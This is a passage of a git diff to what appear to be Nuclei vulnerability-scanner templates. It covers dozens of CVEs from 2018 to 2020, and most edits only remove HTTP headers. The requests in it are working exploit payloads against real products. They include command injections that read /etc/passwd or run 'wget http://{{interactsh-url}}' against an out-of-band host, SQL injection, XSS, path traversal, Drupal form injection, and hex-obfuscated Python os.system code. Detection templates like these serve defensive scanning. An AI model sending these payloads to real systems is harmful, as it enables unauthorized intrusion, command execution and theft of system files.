- | GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index e00ef15315..961e31302a 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -12,21 +12,15 @@ requests: - | POST /jolokia/read/getDiagnosticOptions HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded - Content-Length: 167 { - "type" : "read", - "mbean" : "java.lang:type=Memory", - "target" : { - "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" - } + "type":"read", + "mbean":"java.lang:type=Memory", + "target":{ + "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" + } } matchers-condition: and @@ -35,6 +29,7 @@ requests: words: - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389" part: body + - type: status status: - 200 diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml index d2feac4619..4591ccbbf3 100644 --- a/cves/2018/CVE-2018-1000533.yaml +++ b/cves/2018/CVE-2018-1000533.yaml @@ -17,8 +17,6 @@ requests: - | POST /{{path}}/tree/a/search HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 45 Content-Type: application/x-www-form-urlencoded query=--open-files-in-pager=cat%20/etc/passwd diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index 6001320f0c..0c21319c5d 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -12,8 +12,6 @@ requests: - method: GET path: - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x' - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index c775728787..f134dc0cba 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -15,8 +15,6 @@ requests: - | POST /system/sharedir.php HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.58.0 - Accept: */* Content-Type: application/x-www-form-urlencoded &uid=10; wget http://{{interactsh-url}} @@ -24,8 +22,6 @@ requests: - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.58.0 - Accept: */* Content-Type: application/x-www-form-urlencoded &act=sync&task_number=1;wget http://{{interactsh-url}} diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 31ab970f95..9f8c759dfc 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -15,10 +15,6 @@ requests: - | POST /upload HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index b59d969f15..d04aa76fc8 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -15,7 +15,6 @@ requests: - | GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index fbcb014f26..433bc92b78 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -15,7 +15,6 @@ requests: - | GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Referer: {{BaseURL}} matchers: diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml index e6423cda4b..51fa08f10d 100644 --- a/cves/2018/CVE-2018-18778.yaml +++ b/cves/2018/CVE-2018-18778.yaml @@ -13,7 +13,6 @@ requests: - |+ GET /etc/passwd HTTP/1.1 Host: - Content-Length: 4 unsafe: true matchers-condition: and @@ -21,6 +20,7 @@ requests: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index d5b0522d34..49b4dc9d42 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -19,13 +19,10 @@ requests: - | GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 - | GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 extractors: - type: regex diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index a92638e44f..9aff058ee4 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -12,13 +12,10 @@ requests: - | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json Referer: {{Hostname}}/user/register X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 - Content-Length: 626 - Connection: close -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index bb3a606f79..7341f180dd 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -14,11 +14,6 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Authorization: Digest username=admin matchers-condition: and diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index 6943ee9c04..cb37d90548 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -16,14 +16,7 @@ requests: - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Content-Length: 91 - DNT: 1 - Connection: keep-alive - Upgrade-Insecure-Requests: 1 username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login @@ -32,6 +25,7 @@ requests: - type: status status: - 200 + - type: word words: - '>' diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 3d64ab75f5..2053f87579 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -22,7 +22,6 @@ requests: - | POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded yuzo_related_post_css_and_style= @@ -30,8 +29,6 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Upgrade-Insecure-Requests: 1 req-condition: true matchers-condition: and diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 7569402a99..14ca50d4c4 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -17,8 +17,6 @@ requests: GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 2229b3f142..9d736b993d 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -13,14 +13,9 @@ requests: - | POST /password_change.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Referer: https://{{Hostname}}/ + Referer: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Content-Length: 73 - Connection: close - Upgrade-Insecure-Requests: 1 user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml index 4628e2aa48..21efd21490 100644 --- a/cves/2019/CVE-2019-16278.yaml +++ b/cves/2019/CVE-2019-16278.yaml @@ -12,9 +12,6 @@ requests: - | POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Content-Length: 1 - Connection: close echo echo diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml index 5548784290..2ac46ac67b 100644 --- a/cves/2019/CVE-2019-16920.yaml +++ b/cves/2019/CVE-2019-16920.yaml @@ -13,41 +13,27 @@ requests: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 + Referer: {{BaseURL}} html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and matchers: - type: regex @@ -55,6 +41,7 @@ requests: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or + part: body - type: status status: diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index 951533f8d8..d25a72cee2 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -13,7 +13,6 @@ requests: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept-Language: en-US,en;q=0.9 payloads: diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index 4293fed10d..b7c1855604 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -11,14 +11,11 @@ requests: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Connection: close - | POST /solr/{{core}}/config HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Content-Length: 259 { "update-queryresponsewriter": { diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index 7a4d6d2413..1d87fb5936 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -16,7 +16,6 @@ requests: POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Length: 76 Content-Type: text/xml; charset=UTF-8 diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml index 48af892d4f..dd385d5b7f 100644 --- a/cves/2019/CVE-2019-3396.yaml +++ b/cves/2019/CVE-2019-3396.yaml @@ -12,12 +12,7 @@ requests: - | POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {{Hostname}} - Accept: */* - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}} - Content-Length: 168 - Connection: close {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} @@ -26,6 +21,7 @@ requests: - type: status status: - 200 + - type: word words: - "contextConfigLocation" diff --git a/cves/2019/CVE-2019-6715.yaml b/cves/2019/CVE-2019-6715.yaml index 343ea0316b..e004b0f931 100644 --- a/cves/2019/CVE-2019-6715.yaml +++ b/cves/2019/CVE-2019-6715.yaml @@ -12,11 +12,7 @@ requests: - | PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 Host: {{Hostname}} - Accept: */* - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 - Content-Length: 124 Content-Type: application/x-www-form-urlencoded - Connection: close {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"} diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index 660516cef2..a236e9b923 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -11,31 +11,21 @@ info: tags: cve,cve2019,emerge,rce requests: - - raw: # Default Port + - raw: - | GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 + - | GET /nuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml index d2fd2f0946..97c3a627c3 100644 --- a/cves/2019/CVE-2019-7609.yaml +++ b/cves/2019/CVE-2019-7609.yaml @@ -10,31 +10,27 @@ info: - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 tags: cve,cve2019,kibana,rce - # Kibana versions before 5.6.15 and 6.6.1 - # contain an arbitrary code execution flaw in the Timelion visualizer. - # An attacker with access to the Timelion application could send a request - # that will attempt to execute javascript code. - # This could possibly lead to an attacker executing arbitrary commands - # with permissions of the Kibana process on the host system. - requests: - method: POST path: - "{{BaseURL}}/api/timelion/run" headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-Type: "application/json; charset=utf-8" - body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}" + + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + matchers-condition: and matchers: - type: word words: - "seriesList" part: body + - type: word words: - - "Content-Type: application/json" + - "application/json" part: header + - type: status status: - 200 \ No newline at end of file diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index fcb6483f59..059f75bb43 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml @@ -12,7 +12,6 @@ requests: - | POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml /usr/local/netsweeper/webadmin/out + # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" headers: - Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php" - User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)" - Connection: "close" + Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" + matchers-condition: and matchers: - type: word words: - "nonexistent" part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index c9408d639e..4a4140cb1c 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -13,13 +13,11 @@ requests: - | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded - | GET /include/nuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml index 5ba27f8bc5..12f3ac20ab 100644 --- a/cves/2020/CVE-2020-16139.yaml +++ b/cves/2020/CVE-2020-16139.yaml @@ -14,7 +14,6 @@ requests: - | POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 matchers-condition: and matchers: diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml index 3f0e6b6d93..c98ea1fe16 100644 --- a/cves/2020/CVE-2020-17505.yaml +++ b/cves/2020/CVE-2020-17505.yaml @@ -13,16 +13,12 @@ requests: - | GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close - | GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close cookie-reuse: true matchers-condition: and @@ -33,6 +29,7 @@ requests: - "Position: ||whoami||" - "root" condition: and + part: body - type: status status: diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index c0d3c87ab1..8e59416072 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -16,9 +16,7 @@ requests: POST /jars/upload HTTP/1.1 Host: {{Hostname}} Accept: */* - Accept-Language: en Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y - Content-Length: 187 ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index db823bc245..13d8570a5b 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -14,25 +14,14 @@ requests: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 745 - Accept: */* X-Requested-With: XMLHttpRequest - sec-ch-ua-mobile: ?0 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak Origin: {{BaseURL}} - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: cors - Sec-Fetch-Dest: empty Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 5f354d7712..24b6fd03d9 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml @@ -13,34 +13,21 @@ requests: - | # Response:Location: /page/login/login_fail.html POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - DNT: 1 - Connection: close Cookie: uid=6gPjT2ipmNz - Upgrade-Insecure-Requests: 1 - Content-Length: 0 username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - DNT: 1 - Connection: close Cookie: uid=6gPjT2ipmNz - Upgrade-Insecure-Requests: 1 - Content-Length: 0 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "nobody:[x*]:65534:65534" diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 88ec587026..f2553035ef 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -19,9 +19,7 @@ requests: POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Content-Length: 608 Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 - Connection: close --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 10a508915e..d2352c64ac 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -15,18 +15,14 @@ requests: - | POST /cgi-bin/system_mgr.cgi? HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close matchers: - type: word diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index 8381e16ece..b9efcf09b6 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -15,9 +15,7 @@ requests: - | POST /login.htm HTTP/1.1 Host: {{Hostname}} - User-Agent: 